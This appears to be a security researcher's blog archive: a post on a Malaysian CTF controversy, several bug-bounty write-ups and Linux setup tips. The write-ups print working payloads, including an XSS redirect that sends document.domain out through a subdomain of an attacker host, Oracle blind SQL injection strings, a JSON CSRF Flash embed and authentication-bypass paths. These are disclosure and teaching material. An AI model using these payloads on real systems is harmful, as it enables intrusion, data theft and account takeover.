Saturday, March 9, 2024

Oh why. CTF Dramas.

Hmm..This will be my first time publishing non-tech related just to clear up the dramas from the local cybersecurity scene. I'll try to answer each of them in chronologies, mentioning friends' names (some will be redacted) and screenshots as proof.

Why I attended RAWSEC RENTAS

  • This is for sure a sign of support for their commitment to organise cybersecurity events in Malaysia. I've reposted the event's details, like (thumbs up) the posts that they shared in Linkedin and other social medias.
  •  

  • Do I really want to go there? Not really. The reason is the place is too far from my home. I need to spend ~RM100+ to travel there. However, my friend Sr****n said he would be there to listen to the talks. Also, there will be many friends from M53 and MCC alumni will participate in the CTF. Taking advantage of that, considering fasting month is coming soon, I decided let's go and have a gathering too. See below and check the dates.



Done. Next:

"Ok je" comment.



  • Correct. I agreed that I said "ok je" which I still stand on my opinion for that. Nothing is wrong with the CTF at RENTAS. But please dont twist too much in here. That's the only comment I gave and when RAWSEC's crew, Sh****l wanted to gather more opinion I was ready. We were at the round table in the hall, and he brought his Macbook which I assumed he wanted to take note of my further opinions. But none of that happened. Why? Because my friend, Sr****n, who also was a co-worker of Sh****l came to the table and we started talking about other stuff while listening to the first talk about DevSecOops. Then came another friend which also a RAWSEC's crew, E**a, and the conversation about other topics kept going until the first talk finished. Then it was a quick break. During this time, me, Sr****n and three other friends decided to see the CTF which was held at a different building, 1km from the hall. Sr****n decided to walk there, I followed. 
  • End. I hope the person who tweeted this, could ask Sh****l for further clarification. Sr****n was there too, feel free to ask him as well if needed.

Why "Ok je"

  • Ok je = acceptable. During the pre-qualification round, RAWSEC posted a poll on Linkedin and I voted as "Below expectation". At that time, yes I stand with that decision, it was "Below expectation" due to the comments and complaints I saw in chats about the questions by the participants (from M53 and MCC members). I received a message from someone stating that, RAWSEC members were quite upset with it.



  • On what justifications? Because as also a CTF organiser and player, I'm expecting a good challenge from the RENTAS organiser. When I say good, it means not too many guessy challenges, clear questions, and no trolls. Check the chat logs from the participants below:







  • In fact, me and friends keep educating others who would organiser CTF to not do trolls or guessy (read stega) challenges anymore. We shared the presentation about it at a few local cybersecurity conferences:
  • https://twitter.com/zeifan/status/1718564186626920751


  • So were all of the questions guessy? No, of course. Some of them were good. Kudos to the challenge's creator(s)


  • and, you Mr Rydenz, at the end of the pre-qualification told to the participants that the CTF is for students and for fun! Dont compare with Defcon or BH. OK! That's a good reason.


  • With all of these, I agree that the CTF  was "Ok je" a.k.a acceptable if that's the goal. Nothing else. Not comparing with other CTF etc.

The retweet drama

  • I learned about the tweets from yondie and trailblazer when I was at the RENTAS venue, if I'm not mistaken around 2-3PM. It was told by other friends who recently arrived there. As an open-minded person, I also of course agreed with their opinions! Why? Do research on who are these two persons. They have vast experience in handling CTF, and won CTF local and global when they were a student and even after they graduated. Their passion can't be compared with someone like me who are still not as good as them! Can't I agree with them? The dramas have been circulated around the community, and of course, people who want to voice out their opinions will do so.
  • https://twitter.com/Trailbl4z3r/status/1765819413498826798
  • https://twitter.com/y0nd13/status/1766348637934928259
  • The real question is, WHY THE F I'M THE ONE WHO NEED TO TAKE THE RESPONSIBILITY OF OTHER F OPINIONS?! Check the number of people who retweeted and liked their status.

Constructive feedback?

  • I'm open to giving constructive opinions based on research, data, and experience I had when organising, playing, learning, and observing CTFs. But first I want to let the organiser do what they are doing. I can't put my opinions on others' events. That's their hard work and I should respect that. Especially when I heard many of the participants' opinions were straight away rejected by the organiser, I decided, to stay quiet.
  • However, Mr Rydenz keeps forcing me to give opinions and I hope the below constructive feedback will be accepted. https://twitter.com/rydenxxs/status/1766505793783026005

Pre-qual writeups judging:

  • Good catch on the abnormal writeups by the teams your team identified. I would also put these writeups in my "suspicious" list. 
  • The not-so-good action here is the rush decision made by the judges. Directly disqualifying them without further investigations and interviewing them would likely make your decision may be wrong.
  • When I heard about the teams who were disqualified, I asked for their writeups. I read them. I asked them what reasons they were disqualified. Fair comments from the judges. However, innocent until proven guilty. The next step the judges should take consideration before deciding should disqualifiying them are:
    • Their situation. Pre-qual was taking place on weekdays. They are students. Some might have classes, exams or some might be in their internship sorting their workloads. 
    • There is a likelihood of them rushing to submit them without revisiting the writeups again after a sleepless night.
    • Is it their fault for being clumsy? Correct. But we need to have empathy. Be in their shoes. Otherwise, our wrong decision might miss a good talent.
    • Judges can not to announce the results yet. Those teams with similar "abnormal" cases, can be reviewed again by having simultaneous video interviews without them knowing the reason for the interview. Send an invitation to their team, and do the interview at the same time, with different people. You are likely to have many judges, ask each of the judges to pick which team and conduct the interview at the same time to avoid they again, cheating.
    • Compare their "abnormal" flag submission timestamp
    • Compare their normal flags submission timestamp. 
    • Look if there's anything that abnormal with the submissions which can hint you they are sharing flags.
    • Remember, sharing flags requires two teams at least. Provider and the receiver. 
    • If proven with solid proof, disqualify.
    • If cant be proven with solid information, you can either deduct the points of where the "abnormal" questions, penalty, or vote among the judges to disqualify them or not.

Unclear information and misleading in the question itself

  • Some challenges were added into categories that did not fit with how to solve it
  • Some challenges were provided with guessing questions
  • Too much trolls and rabbit holes
  • An example is the Mobile DFIR challenge.


  • The title could be replaced with "Tampered Mobile DFIR Report" which means the participant can understand they need to focus on the report itself instead of looking the Mobile's RAW extracted from a device which is generally being used for Mobile Forensic. 
  • Here are some examples, checkout how the question is being used:
  • https://palliativeeye.medium.com/mobile-forensics-ctf-write-up-90bfbf49d2da
  • https://github.com/xtiankisutsa/awesome-mobile-CTF
  • The description above could be better misleading with "the data has tampered", but replaced with "the report has been stolen and someone tampered with the details". Clear and precise.

Do not jump to conclusions immediately

  • For every feedback received, do not respond to it immediately. Instead, discuss with your team first before replied them to ensure everyone agrees with it first. 
  • Do not be defensive. There are ways how to positively respond to an upset comment from participants.

No areas at the onsite CTF

  • Me and friends were there to visit the finalists as a moral support. It is common for every onsite CTF to have an area that will be reserved for visitors to observe.
  • At least, if the room can't be entered at all, screen the scoreboard outside where visitors can see. That's the only entertainment they have. To make it more interesting, one or two of your team members could be commentators to describe what is happening from the judges' dashboard, without disclosing hints or hidden contents.

Okay. I have enough dramas to entertain already. I need to take my bus back to my home. All the best, I hope you can accept the opinions given in this post and also for the participants who read this, give real feedback. Stop being a "humble-politician". Otherwise, the CTF scene in Malaysia will not get better. 

Thanks

Tuesday, October 13, 2020

I had fun with this XSS

Recently, in a private bug-bounty program I've found an interesting XSS vulnerability where the vulnerable endpoint limits the use of special characters. The user's input got reflected in the following:

<script type="text/javascript">
            window.onload = function () {
                window.location = 'https://url/reflected-point'

It looks like a straightforward XSS vulnerability when it was possible to break the tag using the ' character. Generally, the following payload '-alert(0)-' should work, but unfortunately, the actual challenge just started.

I found that most of the special characters were filtered (as in removed from the content when they were inserted). After a minimal fuzzing, the following special characters were the only accepted and reflected via this endpoint:

, . = : @ # ? * %


I tried to confirm if this is still possible through experimenting on JSFiddle. I noted that instead of using - , we can use the comma sign too when the reflection point is the same as the codes mentioned above. Means, ',alert(0),' is actually possible.


Now, it is not done yet. Remember that parentheses are not allowed.

Thus, I tried to look for any ways to execute an alert box as it is an easy way to demonstrate an XSS vulnerability. However, none of the ways that seem possible using the allowed special characters in this situation..except, location=name

I started focusing on that and at the same time asking ideas from people in Slack and my CTF team. I found out through JSFiddle, the following payload seems possible. 

',document.location='javascript:document.domain','


Done? Not yet. It was a success when I tested in the JSFiddle, but it was not when tried on the vulnerable website. This was because it will throw 500 error message when it detects if the request contains the unpermitted strings match like javascript:document.*

The further test found that I can redirect the request through window.location=http://url. At first, it was a fail as // characters are not allowed. However, the request still gets redirected without the slashes. window.location=http:url was possible 

At this stage, it already enough to prove the JavaScript execution. But from the triager/customer perspective, this seems just like an open redirection vulnerability. I still need to show that it is possible to exfiltrate the content to the external domain. Easy? Yeah, the following payload should work basically..
',window.location='http:my-url/'%2bdocument.domain%2b,'

But no..it was not working..since the payload contains / again. Thus, there's another bummer. Until my CTF team member, johnburn, told me to simply parse the content that I want as the subdomain instead. Similar to exfiltrating data via DNS. Honestly, I have never tried that. But..it actually works!

So the final payload was:
',window.location='http:'%2bdocument.domain%2b'.my-burp-domain','

And of course, it got accepted :). It is always great to learn something new and share with everyone. If there's another way that should work, feel free to share it with the community.





Thursday, April 16, 2020

Tricky Oracle SQL Injection Situation

Recently I learnt few new stuff when solving SQL Injection found during pentest and also bugbounty. One of the new technique that seems new to me is the one that I learnt from my master, pokleyzz. This injection was found in a recent bugbounty program and the actual path/parameter were replaced.

The injection was found on the "idNumber" parameter of the following endpoint
/foo/?theName=YAP&idNumber=248001[here]
Common payloads were performed on this target and initially, I found the following payloads were working to identify TRUE/FALSE condition

/foo/?theName=YAP&idNumber=248001'+AND+'1'='1 TRUE
/foo/?theName=YAP&idNumber=248001'+AND+'2'='1 FALSE 

and also able to use pipe operator too

/foo/?theName=YAP&idNumber=248'||'001 TRUE
/foo/?theName=YAP&idNumber=24'||'8'||'001 TRUE
/foo/?theName=YAP&idNumber=24'||'X'||'001 FALSE

With these conditions, I was able to narrow down the database used by this application to Oracle, PosgreSQL, IBM DB2 or Informix.

At first, I thought this can be done using the same technique that I know:

See : https://blog.yappare.com/2012/04/advance-oracle-blind-sql-injection.html

However, the CASE() was not working. After few attempts, I stopped to figure out on using CASE(). Next, this technique was tried:

See: https://blog.yappare.com/2017/03/blind-sql-injection-in-erim-not-sure.html

No joy. Dead end. After almost two days of trying, I give up doing it myself and ask helps from few friends.
No luck. I tried my last option, pokleyzz. In just less than an hour, he showed me the technique that can be used.

/foo/?theName=YAP&idNumber=248'||<bruteforce any known SQL functions here>||'001

As a result, I found "rownum" was accepted and this indicates the DBMS is Oracle. To reconfirm, the following was queried:

/foo/?theName=YAP&idNumber=24800'||rownum||'

The above payload result in the website displayed list of "theName" product that starts with "idNumber" 24800

Interesting! Now how we can at least extract data from this injection? Another blocker was identified. It seems the application filtered/replaced the following characters
_ ( ) + . whitespaces
While I found this seems another dead end, pokleyzz showed another brilliant way to extract the data using the following payload:

 /foo/?theName=YAP&idNumber=248'||<bruteforce all column_name here>||'001 - We found few column names which one of it was "username"
Then final step was:

 /foo/?theName=YAP&idNumber=248001'and''||username||''like'<bruteforce-character>%
 I ran the Intruder on the above attacking point and voila, got the username 😼

As always, pokleyzz is the best master I have. 💻

Bye.

Friday, February 15, 2019

XPS 13 - Boot from USB

It seems booting Linux through USB (created via Unetbootin) is quite tricky. The following configuration need to be set in your XPS BIOS setting before you can boot Linux from USB.


  1. Start your XPS 13 and press F12 to enter BIOS Setup
  2. In the BIOS Setup:
  • POST Behavior > Fastboot. Change to Thorough option
  • Secure Boot > Disable
  • Switch SATA Operation to AHCI
  • After all the above options/setting have been configured, go to Boot order option to add USB in the list

References: Random answers from https://stackoverflow.com/ and https://dell.com/

Wednesday, February 6, 2019

Parrot OS - Couldn't connect to Wifi even SSIDs can be seen

Problem: Couldn't connect to the wireless connection even the SSID's can be seen in the list

Solution:

  1. Edit the NetworkManager configuration
  2.  sudo nano /etc/NetworkManager/NetworkManager.conf  
    

  3. Add the following lines in the configuration file
  4.  [device]
    wifi.scan-rand-mac-address=no  
    

  5. Restart the NetworkManager service
  6.  sudo systemctl restart NetworkManager
    

    Thank you burzintaj for the suggestion.
    Reference: https://unix.stackexchange.com/questions/397620/wifi-wont-connect-even-though-it-shows-all-the-ssid

Tuesday, January 29, 2019

Wednesday, January 17, 2018

$1800 in less than an hour.

Sometimes, visiting an old program is gold.

October, 2017. I just finished writing up my report and while waiting the report ready for QA process, I visited one of my favourite program in Bugcrowd, Indeed.com

I noted that the program went public and also the reward had been increased. Since it went public plus with a wide-scope targets, as I'm expecting, the vulnerabilities found must be huge.



That was not an issue at all. If you guys following the tips given through my presentations in Levelup, ChCon or Bsides NZ, one of the way that I usually will look at is 'less-participant' target. As the targets are inclusive *.indeed.com/*, I tried to find any available browser's extension by Indeed.com..There's one for Chrome :)


Not really expert in identifying vulnerability in browser's extension, so I poked around people in bugbountyforum.slack.com asking for some guides.

Installed the extension in Chrome. Checked on the scripts used in this extension, not many joys. Turned my BurpSuite to see how's the extension being used and found that it is possible for a straight forward self-stored xss which will be executed under jobox.indeed.com domain
POST /api/jobApplication? HTTP/1.1
Host: jobox.indeed.com
Connection: close
Content-Length: 117
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.62 Safari/537.36
Content-Type: application/json
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: INDEED_CSRF_TOKEN=token

{"status":"WISHLIST","url":"javascript:alert(0)","notes":"test","jobTitle":"test","companyName":"texst","userId":"1"}
Self-XSS might not be rewarded. So, one of the way to exploit it is via CSRF attack. What a luck, the CSRF-Token was not properly validated. Knowing the CSRF was not effective plus the response was in JSON, I remembered that there's a blog mentioned it is possible to perform CSRF attack even the response is in JSON - https://www.geekboy.ninja/blog/exploiting-json-cross-site-request-forgery-csrf-using-flash/. Also, thanks to the tool created by sp1d3r, the exploiting process was easier.

Put all of them in one HTML request,

<embed src='http[s]://[yourhost-and-path]/test.swf?jsonData={"status":"WISHLIST","url":"javascript:alert(document.domain)","notes":"test","jobTitle":"test","companyName":"test"}&php_url=http[s]://[yourhost-and-path]/test.php&endpoint=https://jobox.indeed.com/api/jobApplication?></embed>



The reward was spent for my holiday trip in December..all thanks to the 1 hour effort spent in the program :D

Thanks.

Sunday, August 13, 2017

Accidentally typo to bypass administration access

A new post from me to kill some times.

This was from an old invited private program in one of the bugbounty platform. This program offers $15,000 in total. There were several targets given, but most of them were limited in term of functionalities and forms.

One of the application in scope attracted me as it responded differently if viewed in a different browser's platform. Which means, you will only allowed to access their mobile site if the application detected your user agent is coming from Mobile. This application just consist of few functionalities such as
  • query for available *item*
  • view for available schedule
  • information of the certain *item*
  • no login
Based on the above functionalities, this seems like a common website that provides with a general information of their product/items. I spent few days looking on their Desktop Website and found few XSS. Looking at the source page of the website, I've noticed there's a script that contain a hyperlink to a mobile site. It looks something like below:
 <script type="text/javascript">
   var attr = "href";
   var value = "/mobileapps";
   elem.setAttribute(attr, value);
</script>
However, I was not able to access it directly using Desktop browser. I tried to change my user agent into Android's string, it worked!

Now I'm in their mobile site. Found another few XSS. Good. Considering the current findings, I'm probably will be rewarded up to $2000 in total. Good enough. But then, something is bothering me where from my Burp's request, there's a 302 redirect response whenever the Burp's Spider tried to access /admin path. Weird. I tried to check if there's any JS files that I can use to bypass this thing as what I did like in my previous blogpost.

No success. sadpanda.

But then, during the testing I've mistakenly typo'ed the /admin into /Admin (This happen regularly since using Macbook. The keyboard quite small for my finger's size)
To the surprise, due to that typo, I was able to access into the administration page. What a magic. It seems there was a weak configuration at their backend which only restrict access for /admin BUT not if the word contain at least one capital letter. /Admin, /aDmin/, /ADMIN all of these words can be used to bypass the check.

Now I'm in administration page. There were lots of functionalities inside and ALL of them were vulnerable. Reflected and Stored XSS, SQLi, CSRF, and etc. Submitted all of them. Out of $15000, 70% was mine :)

Lessons:
  1.  Do not forget to test in mobile environment 
  2.  Do not forget to test target's mobile site
  3.  Do not give up if the application looks really simple, there's probably a hidden administration page in it
  4.  Look on the application's response. If weird, try to bypass.
Till next time.
Cheers.

Monday, June 5, 2017

From JS to another JS files lead to authentication bypass

This was found in a private bug bounty. The scope is limited to a few of features that available to the public. Based on the previous reported issues (5 bugs submitted by others so far when I was initially invited), seems it is hard to find a new issue. It also mentioned in the bounty details that

If you manage to get into Administration page, report immediately and do not pivot or further testing in /admin

However, there is an administration page which was restricted to unauthenticated and unauthorised users. Browsing to /login or /admin will redirect us to https://bountysite.com/admin/dashboard?redirect=/

Bruteforcing the login page probably an option but I'm not a fan of bruteforcing a login page. Looking at the source page, nothing much useful. I started looking on the application's structure. It seems the JS files were located in few directories such as /lib, /js, /application and etc.
Interesting.

I run the BurpSuite and run the Intruder to identify any accessible JS files in these directories. Set the path of attacking/fuzzing points at https://bountysite.com/admin/dashboard/js/*attack*.js 
Yep, make sure you didn't forget the .js so we will receive the 200 response if the file is accessible. Interesting, again. Because one of the accessible JS files was /login.js

Accessing the JS file https://bountysite.com/admin/dashboard/js/login.js redirect me to the Administration page :) But, I have no permission to view it. Only partial of the interface can be seen.

SadPanda.jpg


But I didn't stop at here. It seems weird why the page is loaded as an HTML while I browsed to a .js file? After playing around, I noticed that the actual reason that allowed me to get into this administration page was because the *login* word. Yes, as long the request after /dashboard/ contains a word with the string of *login* (exception to 'login', this will only redirect me back to the login page.), will allow us to get into this Administrator's interface, but without a right authorisation.

Further tests were performed from this limited Administration's interface. I looked into the source page and again, trying to understand the structures. From this interface, there are some other JS files that helps me to understand how an administrator can perform an action. Some of the action require a valid token. I tried to perform the action using the leaked token in one of the JS file, not working. The request will be redirect back to the login page. Looked on another JS file, I found there's another path that actually exist which served some content. It was /dashboard/controllers/*.php

Again, I run the Intruder to check if there's any other path which can be accessed from here. From the second Intruder attacks, I found few other paths that were exist but have no authorisation to access it. This was based on the 500 or 200 HTTP response.

SweetPanda.jpg
Back on the structures that I learnt in the first phase of recon, I found that these path were defined by /controllers and being used thru /dashboard/*here*/
However, another bump, directly accessing the path will redirect me to the login page. Seems the session checking quite tough over here. I was about to give up at this point and also sleepy too, but I want to try a last attempt. What if I used the same method to access the Administrative page to access and perform these actions?
Interesting, climax. :) I'm able to do so.

By browsing to the /dashboard/photography/loginx redirected me to the Admin Photography page with the full functionality that I can use.

Photography functions.

From here, I'm able to perform and access all the available actions and paths in  /dashboard/* which was full with other vulnerabilities such as SQLi, XSS, File Upload, Open Redirect and etc. However, I didn't attempt more on it as all of these issues were out of scope as what had been defined by the program to immediately report to them if the Administration's authentication was found broken. Also, additional notes that I noticed from the debug error enabled on the Administration's page, what made I'm able to access these Administration pages was because of the misconfiguration of the application at /dashboard/controllers/* lines where whenever a *login* found in the request, the application should redirect to the main login page, however, it was not working as it was intent.

It was a fun day indeed :)
I was rewarded with the Max amount of this program.

Chio.

Wednesday, March 29, 2017

Blind SQL Injection in er..I'm not sure what's the DBMS is.

A short blogpost from me.
Recently participated in a private bounty program and found an SQL Injection issue on one of the available parameter.

Injection looks like follow:

id=11) and (1=1
Normal eh? But SQLmap and few test cases from me could not determine the DBMS it used. High chance it is MSSQL, MS Access or Jet Database. This is from the observation seen on the patterns that can be seen. I've also asked people around to conclude this. Manage to provide a simple POC such as
id=11) and 1=1 and (1=1 
id=11) and 12 and (1=1
to show the existense of TRUE FALSE condition. But still, to convince the program owner, at least, we need to show it is possible to extract table_name or column_name. After a day of trying, I've figured out how to make the POC. How silly, it is so simple!
 id=11) and (<column_name>=<column_name>
So, if the column_name is exist, it'll be TRUE while if not exist, it'll be FALSE. How to automate it?
All we need to do is run our Burpsuite, send the vulnerable parameter to Intruder. Use Battering Ram attack type, and choose our own wordlist contain the list of column_name. I used the one in SQLmap common_columns.txt

Result as follow:


Easy!

Thanks

Friday, December 9, 2016

Bug Bounty : Account Takeover due to a Misconfiguration

First of all, I would like to thanks Bugcrowd's analyst especially beemo_bugcrowd for patiently updating the issue during the validation process.

Fiat Chrysler Automobiles announced their public bug bounty program through Bugcrowd in July 2016. More details can see it here: https://bugcrowd.com/fca
As always, I will try to poke around to see how many of the reports are currently being handled by the Bugcrowd for this program as if there are too many crowd, usually I will opt out from it. And the result, yes, there are lot of them especially XSS and CSRF issues. That was the reason these two issues immediately excluded to allow analyst team to filter out them.

I'm targeting Mopowerconnect.
Mopowerconnect


Due to that, I try to look on the other angle and I noticed something which is weird in my view which is the way account was created in Mopowerconnect (was in scope but now excluded). Why? Please refer the figure below:

Authentication process


*this is just based on my observation and own hypothesis during the testing.

To detail the figure above:
  1. When a user creates an account at Mopowerconnect, the request will be sent to Chrysler to generate the authorisation and then at the same time will create another independent account which only be used by Sharepoint.
  2. Means, if you create User1 at Mopowerconnect, Chrysler will processing it and provide you with the authorisation for Mopowerconnect as User1, and at the same time it will create another account for you which is to be used in Sharepoint, assume as UserS1.
How do I know there's a Sharepoint at the backend? This is because there's a misconfiguration which allow an attacker to directly access that framework through URL such as /_catalogs/masterpage/etc/etc . I first submit the misconfiguration issue, it was a dupe. Then I went to look around this Sharepoint pages to understand why it exist. There I noticed that, I'm browsing the Sharepoint pages using UserS1 account, not User1. 

Sharepoint UI

I went back to check on my Burp HTTP history to look on all of the responses. Then I found the request and the parameter that supply my another account, UserS1. It was weird to see there are two types of ID on the request.

Request made at Chrysler


 Then I created another testing account to double verify my hypothesis. And it is proven. At this point, I still can't think what's the best scenario I can do. Then, the idea came in. What if I try to reverse the process? Reset the password :)

The request when resetting the password looks similar. Thru Mopowerconnect UI you request to reset the password, then Chrysler will process it and send the information to the Sharepoint to be updated. Interesting.

Again, I reset the password but this time I've modified one of the value before Chrysler send it to the Sharepoint which is PRF_UID. I changed it into my second account and voila! The account was compromised :)

Combining with the issues due to the misconfigured access to the Sharepoint, I'm able to enumerate list of PRF_UID belongs to another users including the admin. And yes, I can takeover the admin's account as well.

Submitted to Bugcrowd, and it is not smooth as I assume because the request was actually being made at Chrysler domain which is out of scope. I knew that but since the issue is considered as Critical, I kept on insist them to forward the report to the client and let FCA themselves decide on this. Two different analysts reviewed the report and marked as Out of Scope. I was at the point to give up until I made a decision to email the issue to the FCA team myself. I used the Bugcrowd's support medium to deliver the message to the FCA team and also did ping another technical team from Bugcrowd to re-review it.

A week later, 

FCA team replied

 At a month later, the issue was fixed!
Fixed!
Thanks!